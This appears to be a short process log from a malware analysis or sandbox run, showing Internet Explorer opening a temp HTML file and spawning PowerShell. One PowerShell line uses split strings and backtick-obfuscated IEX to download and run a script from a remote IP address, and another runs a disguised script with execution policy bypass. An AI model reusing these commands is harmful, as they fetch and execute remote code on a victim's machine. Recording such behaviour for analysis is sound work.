iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\ADMINI~1\AppData\Local\Temp\Encoding.html
6532powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://198.251.72.110/ALL.txt'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
1060powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -noexit -exec bypass -file C:\Users\Public\Microsoft.ps1
596